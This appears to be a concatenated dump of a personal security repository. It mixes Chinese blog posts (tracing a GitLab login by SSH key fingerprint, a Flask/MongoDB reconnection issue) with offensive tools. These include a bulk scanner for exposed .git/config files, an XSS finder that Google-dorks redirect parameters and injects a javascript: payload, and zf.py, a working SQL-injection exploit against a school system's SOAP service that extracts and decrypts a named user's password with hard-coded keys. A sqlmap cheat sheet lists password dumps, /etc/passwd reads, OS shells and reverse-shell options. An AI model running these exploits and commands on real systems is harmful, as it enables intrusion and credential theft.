7 | 8 | from multicpu import multi_cpu 9 | 10 | 11 | def read_file(input_file): 12 | with open(input_file) as f: 13 | domain_list = f.readlines() 14 | result = [] 15 | for domain in domain_list: 16 | domain = domain.strip('\n').strip('\/') 17 | if (not domain.startswith('http://') and 18 | not domain.startswith('https://')): 19 | domain = 'http://' + domain 20 | result.append(domain) 21 | return result 22 | 23 | 24 | def hunt(domain): 25 | url = domain + '/crossdomain.xml' 26 | headers = { 27 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36', # nopep8 28 | } 29 | result = {'domain': domain} 30 | try: 31 | res = requests.get(url, headers=headers, allow_redirects=False) 32 | if res.status_code / 100 == 2: 33 | result['crossdomain'] = res.text 34 | if 'domain="*"' in result['crossdomain']: 35 | result['crossdomain_allow_any'] = True 36 | except: 37 | pass 38 | 39 | url = domain + '/.git/config' 40 | try: 41 | res = requests.get(url, headers=headers, allow_redirects=False) 42 | result['git_hack'] = (res.status_code / 100 == 2) 43 | except: 44 | pass 45 | 46 | return result 47 | 48 | 49 | def main(argv): 50 | parser = argparse.ArgumentParser() 51 | parser.add_argument('-i', '--input', type=str, required=True, 52 | help='The input file consists of domains.') 53 | parser.add_argument('-c', '--cpu_num', type=int) 54 | parser.add_argument('-t', '--thread_num', type=int) 55 | args = vars(parser.parse_args(argv)) 56 | input_file = args['input'] 57 | domain_list = read_file(input_file) 58 | cpu_num = 2 if args['cpu_num'] is None else args['cpu_num'] 59 | thread_num = 4 if args['thread_num'] is None else args['thread_num'] 60 | result = multi_cpu(hunt, domain_list, cpu_num, thread_num) 61 | # TODO: output the result 62 | 63 | 64 | if __name__ == '__main__': 65 | main(sys.argv[1:]) 66 | -------------------------------------------------------------------------------- /2017-08-27-找出是谁登录了你的Gitlab服务器.md: -------------------------------------------------------------------------------- 1 | ## 找出是谁登录了你的Gitlab服务器 2 | 3 | > 尊敬的用户:您的服务器xxx.xxx.xxx.xxx 在XX市(`14.113.xxx.xxx`)处登录,很有可能已被黑客成功入侵,请立即进入云盾-服务器安全(安骑士)控制台,进行查看和处理,如果确认为您自己的操作,请忽略该消息,点击此处去查看 4 | 5 | #### 登录Gitlab服务器,查看`/var/log/auth.log` 6 | 7 | ```bash 8 | $ cat /var/log/auth.log | grep "14.113.xxx.xxx" 9 | Aug 27 21:40:37 gitlab sshd[17276]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request. [preauth] 10 | Aug 27 21:40:46 gitlab sshd[17299]: Accepted publickey for git from 14.113.xxx.xxx port 13370 ssh2: RSA a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx 11 | Aug 27 21:41:03 gitlab sshd[17320]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request. 12 | Aug 27 21:41:42 gitlab sshd[17435]: Accepted publickey for git from 14.113.xxx.xxx port 14544 ssh2: RSA a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx 13 | Aug 27 21:41:42 gitlab sshd[17462]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request. 14 | ``` 15 | 16 | 得到异常登录用户的公钥指纹:a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx 17 | 18 | #### 找出Gitlab所有用户列表 19 | 20 | Gitlab提供的API:https://docs.gitlab.com/ce/api/users.html#for-admins 21 | 22 | 我直接在浏览器里访问:`/api/v4/users?per_page=100`,保存成`users.json`文件 23 | 24 | #### python脚本 25 | 26 | ```python 27 | import base64 28 | import hashlib 29 | import json 30 | import requests 31 | 32 | 33 | # https://stackoverflow.com/a/6682934 34 | def lineToFingerprint(line): 35 | key = base64.b64decode(line.strip().split()[1].encode('ascii')) 36 | fp_plain = hashlib.md5(key).hexdigest() 37 | return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2])) 38 | 39 | 40 | with open('users.json') as f: 41 | for u in json.load(f): 42 | r = requests.get('https://YOUR_GITLAB_HOST/' + u['username'] + '.keys') 43 | for l in r.text.splitlines(): 44 | if not l.startswith('ssh-rsa'): 45 | continue 46 | 47 | fingerprint = lineToFingerprint(l) 48 | if fingerprint == 'a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx': 49 | print u['username'] + ' ' + fingerprint 50 | ``` 51 | 52 | 得到所有用户`ssh keys`公钥的指纹,对比后即可。 53 | 54 | #### 其他 55 | 56 | ```bash 57 | $ ssh-keygen -E md5 -lf ~/.ssh/id_rsa.pub 58 | 4096 MD5:81:d8:4d:ea:10:22:ce:d6:d5:5a:6d:4c:c5:21:b8:d5 test@test (RSA) 59 | ``` 60 | -------------------------------------------------------------------------------- /tools/xss_via_redirect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys 5 | import requests 6 | 7 | from googleapiclient.discovery import build 8 | from urlparse import urlparse, parse_qs 9 | from urllib import urlencode 10 | 11 | 12 | PAGE_SIZE = 10 13 | 14 | # https://console.developers.google.com/apis/api/customsearch/overview 15 | # 新建一个项目,然后获取其配置KEY,一个KEY每天免费搜索100次 16 | DEVELOPER_KEY = '' 17 | 18 | # https://cse.google.com/cse/all 19 | # 添加一个搜索引擎,要搜索的网站设为整个网络,搜索引擎ID 20 | CUSTOM_SEARCH_ENGINE = '' 21 | 22 | session = requests.Session() 23 | session.trust_env = False 24 | 25 | 26 | def search_links(site, keyword, link_dict): 27 | service = build("customsearch", "v1", developerKey=DEVELOPER_KEY) 28 | cse = service.cse() 29 | query = 'site:%s inurl:%s=http' % (site, keyword) 30 | start = 1 31 | for i in range(10): 32 | res = service.cse().list( 33 | q=query, 34 | start=start, 35 | num=PAGE_SIZE, 36 | cx=CUSTOM_SEARCH_ENGINE).execute() 37 | if 'items' not in res: 38 | break 39 | 40 | for item in res['items']: 41 | link = urlparse(item['link']) 42 | key = link.netloc + link.path 43 | if key not in link_dict: 44 | link_dict[key] = link 45 | start += PAGE_SIZE 46 | 47 | 48 | def verify(link, keywords): 49 | payload = 'java\\u0073cript\\u003a\\u0061lert(1);' 50 | query = parse_qs(link.query) 51 | for k in keywords: 52 | if k not in query: 53 | continue 54 | query[k] = payload 55 | headers = { 56 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36' 57 | } 58 | l = link._replace(query=urlencode(query)) 59 | try: 60 | res = session.get(l.geturl(), headers=headers) 61 | if res.status_code / 100 != 2: 62 | continue 63 | if payload in res.text: 64 | print "[Potential XSS vulnerability] " + l.geturl() 65 | except: 66 | print '[ERROR] requesting: ' + l.geturl() 67 | continue 68 | 69 | 70 | def main(site): 71 | print '[INFO] Searching links' 72 | links = {} 73 | keywords = ['url', 'target', 'u'] 74 | for k in keywords: 75 | search_links(site, k, links) 76 | # print links 77 | 78 | print '[INFO] Finding XSS ...' 79 | for k, v in links.items(): 80 | verify(v, keywords) 81 | 82 | 83 | if __name__ == '__main__': 84 | main(sys.argv[1]) 85 | -------------------------------------------------------------------------------- /2016-10-13-Flask-MongoEngine连接问题的思考.md: -------------------------------------------------------------------------------- 1 | ## Flask MongoDB数据库连接 2 | 3 | 在使用Flask进行MongoDB数据库的操作的时候,总觉得没有写检查数据库连接是否存在,如果连接不上,则尝试重连的操作,但线上的服务总能保持住连接,一直没细看。 4 | 5 | 今天尝试了一下,如果支持关闭MongoDB的服务,会出现什么情况? 6 | 7 | ```bash 8 | $ sudo lsof -i:27017 9 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 10 | uwsgi 2929 www-data 13u IPv4 19497 0t0 TCP flask-app.dev.env:35686->flask-app.dev.env:27017 (ESTABLISHED) 11 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (ESTABLISHED) 12 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (ESTABLISHED) 13 | mongod 3328 mongodb 9u IPv4 19377 0t0 TCP flask-app.dev.env:27017 (LISTEN) 14 | mongod 3328 mongodb 12u IPv4 19498 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35686 (ESTABLISHED) 15 | mongod 3328 mongodb 13u IPv4 20420 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35688 (ESTABLISHED) 16 | mongod 3328 mongodb 16u IPv4 20578 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35689 (ESTABLISHED) 17 | ``` 18 | 19 | 目前每个uwsgi进程都连接着MongodDB的服务器。停止MongoDB服务,发现Socket连接进入了`CLOSE_WAIT`的状态。此时Web服务器出现了500。 20 | 21 | ```bash 22 | $ sudo service mongodb stop 23 | mongodb stop/waiting 24 | $ sudo lsof -i:27017 25 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 26 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (CLOSE_WAIT) 27 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (CLOSE_WAIT) 28 | ``` 29 | 30 | 重新启动MongoDB,不做其他操作。 31 | 32 | ```bash 33 | $ sudo service mongodb start 34 | mongodb start/running, process 4103 35 | $ sudo lsof -i:27017 36 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 37 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (CLOSE_WAIT) 38 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (CLOSE_WAIT) 39 | mongod 4103 mongodb 9u IPv4 24443 0t0 TCP flask-app.dev.env:27017 (LISTEN) 40 | ``` 41 | 42 | 可以看到,连接还是没有建立。尝试访问相应的Web服务,发现服务慢慢恢复正常。 43 | 44 | ```bash 45 | $ sudo lsof -i:27017 46 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 47 | uwsgi 2929 www-data 13u IPv4 24558 0t0 TCP flask-app.dev.env:35707->flask-app.dev.env:27017 (ESTABLISHED) 48 | uwsgi 2938 www-data 6u IPv4 24745 0t0 TCP flask-app.dev.env:35709->flask-app.dev.env:27017 (ESTABLISHED) 49 | uwsgi 2939 www-data 6u IPv4 24636 0t0 TCP flask-app.dev.env:35708->flask-app.dev.env:27017 (ESTABLISHED) 50 | mongod 4103 mongodb 9u IPv4 24443 0t0 TCP flask-app.dev.env:27017 (LISTEN) 51 | mongod 4103 mongodb 12u IPv4 24559 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35707 (ESTABLISHED) 52 | mongod 4103 mongodb 13u IPv4 24637 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35708 (ESTABLISHED) 53 | mongod 4103 mongodb 16u IPv4 24746 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35709 (ESTABLISHED) 54 | ``` 55 | 56 | Web服务还是能恢复的。但是,在后续尝试的过程中发现,如果在有持续访问的情况下,连接状态会进入`CLOSE_WAIT`状态,并且很难重新连接上,HTTP请求大量504,重启uwsgi进程才能恢复回正常。 57 | 58 | 另外,补充一个连接池的文档:http://api.mongodb.com/python/current/faq.html#how-does-connection-pooling-work-in-pymongo 59 | 60 | 尝试解决这个问题,发现是uwsgi的日志中存在以下信息: 61 | ``` 62 | /home/vagrant/env/local/lib/python2.7/site-packages/pymongo/topology.py:143: UserWarning: MongoClient opened before fork. Create MongoClient with connect=False, or create client after forking. See PyMongo's documentation for details: http://api.mongodb.org/python/current/faq.html#using-pymongo-with-multiprocessing> 63 | "MongoClient opened before fork. Create MongoClient " 64 | ``` 65 | 66 | 发现原来是uwsgi在启动子进程前,`MongoClient`就已经创建,而文档中要求这种情况下需要使用`connect=False`选项,然而Flask-MongoEngine并没有处理这个配置。https://github.com/MongoEngine/flask-mongoengine/issues/266 这就是坑。 67 | 68 | 另外一个方式:让uwsgi的子进程创建MongoClient而不是加载好app之后再fork进程,uwsgi启动选项:[lazy-apps](http://uwsgi-docs.readthedocs.io/en/latest/Options.html#lazy-apps),增加了应用的启动时间。 69 | -------------------------------------------------------------------------------- /tools/zf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | zf.py 4 | ~~~~~~~~~ 5 | POC of http://wooyun.org/bugs/wooyun-2015-0122523 6 | 7 | Author: Chaobin Zhang 8 | 9 | Legal Disclaimer: Usage of this script for attacking targets without prior 10 | mutual consent is illegal. It is the end user's responsibility to obey all 11 | applicable local, state and federal laws. Developers assume no liability 12 | and are not responsible for any misuse or damage caused by this program. 13 | """ 14 | 15 | import argparse 16 | import base64 17 | import re 18 | import requests 19 | import sys 20 | 21 | KEYS = ['Encrypt01', 'Acxylf365jw'] 22 | 23 | 24 | def decode(value, key): 25 | length_of_value = len(value) 26 | if length_of_value % 2 == 0: 27 | mid = length_of_value / 2 28 | # Split value in the middle -> reverse -> concatenate 29 | value = value[:mid][::-1] + value[mid:][::-1] 30 | k = 0 31 | result = '' 32 | for v in value: 33 | c = ord(v) 34 | bl_1 = 1 if c ^ ord(key[k]) < 32 else 0 35 | bl_2 = 1 if c ^ ord(key[k]) > 126 else 0 36 | bl_3 = (1 if c < 0 else 0) | (bl_1 | bl_2) 37 | bl_4 = (1 if c > 255 else 0) | bl_3 38 | if bl_4: 39 | result += v 40 | else: 41 | result += chr(c ^ ord(key[k])) 42 | k = 0 if k + 1 == len(key) else k + 1 43 | return result 44 | 45 | 46 | def get_password(target, user): 47 | data = """ 48 | 49 | 50 | 51 | 222222' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='%s 52 | 2013-2014-1 53 | KKKGZ2312 54 | 55 | 56 | """ % (user) 57 | headers = { 58 | 'Content-Type': 'text/xml; charset=utf-8', 59 | 'SOAPAction': '\"http://www.zf_webservice.com/GetStuCheckinInfo \"' 60 | } 61 | res = requests.post(target + '/service.asmx', headers=headers, data=data) 62 | password = re.findall('(.+?)', 63 | res.text, re.S) 64 | if len(password) != 1: 65 | print '[ERROR] Can not retrive %s\'s password' % (user) 66 | sys.exit(-1) 67 | password = password[0] 68 | print '[-] The encrypted password of %s is: %s' % (user, password) 69 | MD5_HEAD = '{MD5}' 70 | if password.startswith(MD5_HEAD): 71 | print '[-] Password in MD5 form: %s' % ( 72 | base64.b64decode(password[len(MD5_HEAD):]).encode('hex')) 73 | else: 74 | yes = raw_input( 75 | '[*] Do you want to decrypt the password using the default keys? ') 76 | if yes == 'y' or yes == 'yes': 77 | for k in KEYS: 78 | print '[-] Key ' + k + ': ' + decode(password, k) 79 | 80 | 81 | def main(argv): 82 | parser = argparse.ArgumentParser() 83 | parser.add_argument('-t', '--target', type=str, 84 | help='The target address you want to test.') 85 | parser.add_argument('-u', '--user', type=str, 86 | help='The user you want to get password from.') 87 | args = vars(parser.parse_args(argv)) 88 | if args['user'] is None: 89 | args['user'] = 'jwc01' 90 | target = args['target'] 91 | if target is None: 92 | target = raw_input( 93 | '[*] Please input your target, like "http://xx.edu.cn": ') 94 | HTTP = 'http://' 95 | if not target.startswith(HTTP): 96 | target = HTTP + target 97 | 98 | get_password(target, args['user']) 99 | 100 | 101 | if __name__ == '__main__': 102 | main(sys.argv[1:]) 103 | -------------------------------------------------------------------------------- /2015-11-07-SQLMap.md: -------------------------------------------------------------------------------- 1 | sqlmap工具 2 | ========== 3 | 4 | sqlmap官网: https://github.com/sqlmapproject/sqlmap 5 | 6 | sqlmap实例(摘抄自 https://github.com/LiveXY/elearning/blob/master/sqlmap%E5%B7%A5%E5%85%B7.md ): 7 | 8 | * 获取当前用户名称 9 | 10 | ```bash 11 | $sqlmap -u "http://url/news?id=1" --current-user 12 | ``` 13 | 14 | * 获取当前数据库名称 15 | 16 | ```bash 17 | $sqlmap -u "http://www.xxoo.com/news?id=1" --current-db 18 | ``` 19 | 20 | * 列表名 21 | 22 | ```bash 23 | $sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" 24 | ``` 25 | 26 | * 列字段 27 | 28 | ```bash 29 | $sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 30 | ```` 31 | 32 | * 获取字段内容 33 | 34 | ```bash 35 | $sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 36 | ``` 37 | 38 | * smart智能 level 执行测试等级 39 | 40 | ```bash 41 | $sqlmap -u "http://url/news?id=1" --smart --level 3 --users 42 | ``` 43 | 44 | * dbms 指定数据库类型 45 | 46 | ```bash 47 | $sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users 48 | ``` 49 | 50 | * 列数据库用户 51 | 52 | ```bash 53 | $sqlmap -u "http://url/news?id=1" --users 54 | ``` 55 | 56 | * 列数据库 57 | 58 | ```bash 59 | $sqlmap -u "http://url/news?id=1" --dbs 60 | ``` 61 | 62 | * 数据库用户密码 63 | 64 | ```bash 65 | $sqlmap -u "http://url/news?id=1" --passwords 66 | ``` 67 | 68 | * 列出指定用户数据库密码 69 | 70 | ```bash 71 | $sqlmap -u "http://url/news?id=1" --passwords-U root -v 0 72 | ``` 73 | 74 | * 列出指定字段,列出20条 75 | 76 | ```bash 77 | $sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 78 | ``` 79 | 80 | * 列出所有数据库所有表 81 | 82 | ```bash 83 | $sqlmap -u "http://url/news?id=1" --dump-all -v 0 84 | ``` 85 | 86 | * 查看权限 87 | 88 | ```bash 89 | $sqlmap -u "http://url/news?id=1" --privileges 90 | ``` 91 | 92 | * 查看指定用户权限 93 | 94 | ```bash 95 | $sqlmap -u "http://url/news?id=1" --privileges -U root 96 | ``` 97 | 98 | * 是否是数据库管理员 99 | 100 | ```bash 101 | $sqlmap -u "http://url/news?id=1" --is-dba -v 1 102 | ``` 103 | 104 | * 枚举数据库用户角色 105 | 106 | ```bash 107 | $sqlmap -u "http://url/news?id=1" --roles 108 | ``` 109 | 110 | * 导入用户自定义函数(获取系统权限!) 111 | 112 | ```bash 113 | $sqlmap -u "http://url/news?id=1" --udf-inject 114 | ``` 115 | 116 | * 列出当前库所有表 117 | 118 | ```bash 119 | $sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 120 | ``` 121 | 122 | * union 查询表记录 123 | 124 | ```bash 125 | $sqlmap -u "http://url/news?id=1" --union-cols 126 | ``` 127 | 128 | * cookie注入 129 | 130 | ```bash 131 | $sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" 132 | ``` 133 | 134 | * 获取banner信息 135 | 136 | ```bash 137 | $sqlmap -u "http://url/news?id=1" -b 138 | ``` 139 | 140 | * post注入 141 | 142 | ```bash 143 | $sqlmap -u "http://url/news?id=1" --data "id=3" 144 | ``` 145 | 146 | * 指纹判别数据库类型 147 | 148 | ```bash 149 | $sqlmap -u "http://url/news?id=1" -v 1 -f 150 | ``` 151 | 152 | * 代理注入 153 | 154 | ```bash 155 | $sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118" 156 | ``` 157 | 158 | * 指定关键词 159 | 160 | ```bash 161 | $sqlmap -u "http://url/news?id=1" --string"STRING_ON_TRUE_PAGE" 162 | ``` 163 | 164 | * 执行指定sql命令 165 | 166 | ```bash 167 | $sqlmap -u "http://url/news?id=1" --sql-shell 168 | ``` 169 | 170 | * Dump文件 171 | 172 | ```bash 173 | $sqlmap -u "http://url/news?id=1" --file /etc/passwd 174 | ``` 175 | 176 | * 执行系统命令 177 | 178 | ```bash 179 | $sqlmap -u "http://url/news?id=1" --os-cmd=whoami 180 | ``` 181 | 182 | * 系统交互shell 183 | 184 | ```bash 185 | $sqlmap -u "http://url/news?id=1" --os-shell 186 | ``` 187 | 188 | * 反弹shell 189 | 190 | ```bash 191 | $sqlmap -u "http://url/news?id=1" --os-pwn 192 | ``` 193 | 194 | * 读取win系统注册表 195 | 196 | ```bash 197 | $sqlmap -u "http://url/news?id=1" --reg-read 198 | ``` 199 | 200 | * 保存进度 201 | 202 | ```bash 203 | $sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log" 204 | ``` 205 | 206 | * 恢复已保存进度 207 | 208 | ```bash 209 | $ sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume 210 | ``` 211 | 212 | * google搜索注入点自动 跑出所有字段攻击实例 213 | 214 | ```bash 215 | $sqlmap -g "google语法" --dump-all --batch 216 | ``` 217 | 218 | * 带Cookie 219 | 220 | ```bash 221 | $sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password 222 | ``` 223 | --------------------------------------------------------------------------------